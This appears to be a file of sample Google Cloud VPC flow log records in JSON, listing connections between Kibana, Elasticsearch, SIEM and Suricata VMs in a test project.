+{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"67.43.156.13","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"67.43.156.13","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","
project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"67.43.156.13","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
+{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
+{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.168.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
+{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
+{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
+{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
+{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
